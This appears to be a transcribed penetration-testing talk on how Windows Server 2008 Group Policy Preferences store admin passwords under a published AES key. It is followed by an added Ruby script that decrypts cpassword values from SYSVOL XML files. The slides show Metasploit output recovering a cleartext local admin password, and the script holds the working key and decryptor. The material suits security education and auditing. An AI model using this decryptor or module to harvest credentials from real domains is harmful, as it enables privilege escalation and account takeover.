- 1. Server 2008 Group Policy Preferences (GPP) - And How They Get Your Domain 0wned
  Chris Gates, Carnal0wnage, Lares Consulting
- 2. Whoami
  • Chris Gates (CG)
    – Twitter: carnal0wnage
    – Blog: carnal0wnage.attackresearch.com
    – Job: Partner/Principal Security Consultant at Lares
    – Affiliations: Attack Research, Metasploit Project
  • Work
  • Previous Talks
    – Attack Oracle (via web)
    – wXf Web eXploitation Framework
    – Open Source Information Gathering
    – Attacking Oracle (via TNS)
    – Client-Side Attacks
- 3. Credit
  • Pretty much all of this came from the following post:
  • Exploiting Windows 2008 Group Policy Preferences
    – http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
- 4. What Are Group Policy Preferences
  • 2008 Server gave people the ability to set even more yummy things via group policy.
    – “Group Policy preferences, new for the Windows Server 2008 operating system, include more than 20 new Group Policy extensions that expand the range of configurable settings within a Group Policy object (GPO)”
    – http://technet.microsoft.com/en-us/library/cc731892%28WS.10%29.aspx
  • You can set all sorts of things, including the local administrator password for servers and workstations
    – Via the Local Users and Groups extension
- 5. Example
- 6. Content of groups.xml
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="MyLocalUser" image="0" changed="2011-12-26 10:21:37" uid="{A5E3F388-299C-41D2-B937-DD5E638696FF}">
      <Properties action="C" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="" userName="MyLocalUser" />
    </User>
  </Groups>
- 7. So What
  • When you use the GPO to set the password, it is stored “encrypted” (“obscured”) in a GPO XML object.
  • Who has to be able to see/set GPO? – All users
  • So, if an organization uses 2008 and sets the local admin passwords via group policy, any domain user has access to this XML file.
  • http://blogs.technet.com/b/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx
- 8. So What #2
  • But it's encrypted… obscured… whatever
  • Yes, with AES. And MS published the key…
- 9. Party Time
  • Given that we have the AES key…
  • You can decrypt any password from the XML document
- 10. Party Time
  • Someone made a metasploit module too (post/windows/gather/credentials/gpp)
    msf exploit(psexec) > use post/windows/gather/credentials/gpp
    msf post(gpp) > set SESSION 1
    SESSION => 1
    msf post(gpp) > exploit -j
    [*] Post module running as background job
    [*] Checking locally...
    msf post(gpp) > [-] Error accessing C:\WINNT\SYSVOL\sysvol :stdapi_fs_ls: Operation failed: The system cannot find the path specified.
    [*] Enumerating Domains on the Network...
    [*] 1 Domain(s) found.
    [*] Retrieved Domain(s) DOMAIN from network
    [*] Enumerating domain information from the local registry...
    [*] Retrieved Domain(s) CIS, DEV, DOMAIN, from registry
    [*] Retrieved DC COMPANYINTERNAL.COM from registry
    [*] Enumerating DCs for DOMAIN on the network...
    [*] Enumerating DCs for CIS on the network...
    [-] No Domain Controllers found for CIS
    [*] Enumerating DCs for DEV on the network...
- 11. Party Time
  • Someone made a metasploit module too
    [*] Searching for Policy Share on INTERNALDC...
    [+] Found Policy Share on INTERNALDC
    [*] Searching for Group Policy XML Files...
    [*] Parsing file: \\INTERALDC\SYSVOL\COMPANY\Policies\{4D545393-0DE8-4CDF-985D-0C932F3B7565}\MACHINE\Preferences\Groups\Groups.xml ...
    [+] Group Policy Credential Info
        Name               Value
        ----               -----
        TYPE               Groups.xml
        USERNAME           LOCALdmin
        PASSWORD           A3$r0ck$!
        DOMAIN CONTROLLER  INTERNLADC
        DOMAIN             COMPANY.COM
        CHANGED            2011-06-22 05:38:50
        NEVER_EXPIRES?     1
        DISABLED           0
- 12. Standalone ruby script
  • So if I didn't mention it yet, the module is slow.
  • Had a test where it was downloading the xml but pooping before it spit out the cleartext.
  • Wrote a quick ruby script to decode.
- 13. Output
  F:\Lares>gpp-decrypt-string.rb
  Local*P4ssword!
- 14. Questions?
  Chris Gates
  @carnal0wnage
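An added audit script in the spirit of the decoder on the previous slides, written for this page and not the author's gpp-decrypt-string.rb: it parses a preference XML file, flags every element carrying a cpassword attribute, and decrypts the value with the AES-256 key Microsoft documents in MS-GPPREF to show that any reader of SYSVOL can recover it. The sample Groups.xml and its password are constructed; the gpp_encrypt helper exists only to build that fixture.

```ruby
require 'openssl'
require 'base64'
require 'rexml/document'
# AES-256 key Microsoft documents in MS-GPPREF for cpassword. It is public,
# so anything "protected" with it is effectively cleartext to any domain user.
GPP_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')
GPP_IV  = "\x00" * 16   # GPP uses an all-zero IV
# Decode one cpassword attribute: restore the Base64 padding GPP strips,
# AES-256-CBC decrypt with the published key, convert UTF-16LE plaintext to UTF-8.
def gpp_decrypt(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  c = OpenSSL::Cipher.new('AES-256-CBC')
  c.decrypt
  c.key = GPP_KEY
  c.iv = GPP_IV
  (c.update(Base64.strict_decode64(padded)) + c.final).force_encoding('UTF-16LE').encode('UTF-8')
end
# Inverse of the above, used here only to build a constructed test fixture.
def gpp_encrypt(password)
  c = OpenSSL::Cipher.new('AES-256-CBC')
  c.encrypt
  c.key = GPP_KEY
  c.iv = GPP_IV
  Base64.strict_encode64(c.update(password.encode('UTF-16LE')) + c.final).delete('=')
end
# Audit one preference XML file (Groups.xml, Services.xml, ScheduledTasks.xml, ...):
# every element carrying a cpassword attribute is a finding. Returns an array of
# {file:, element:, user:, password:} hashes so a caller can report or assert on them.
def audit_gpp_xml(xml, file_name = 'Groups.xml')
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, '//*[@cpassword]').map do |el|
    { file: file_name, element: el.parent.name,
      user: el.attributes['userName'] || el.attributes['accountName'],
      password: gpp_decrypt(el.attributes['cpassword']) }
  end
end
# Constructed sample shaped like the Groups.xml on slide 6 (not real data).
SAMPLE_PASSWORD = 'Local*P4ssword!'
SAMPLE_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User name="MyLocalUser" image="0" changed="2011-12-26 10:21:37">
      <Properties action="C" cpassword="#{gpp_encrypt(SAMPLE_PASSWORD)}" userName="MyLocalUser" />
    </User>
  </Groups>
XML
# Report each finding; in a real audit, feed every *.xml under \\<dc>\SYSVOL\...\Preferences\ in here.
audit_gpp_xml(SAMPLE_XML).each { |f| puts "#{f[:file]}: #{f[:element]} #{f[:user]} has a decryptable cpassword" } if __FILE__ == $PROGRAM_NAME
```

The decryptable password is returned rather than printed so the script can be wired into a report that only records which accounts are exposed.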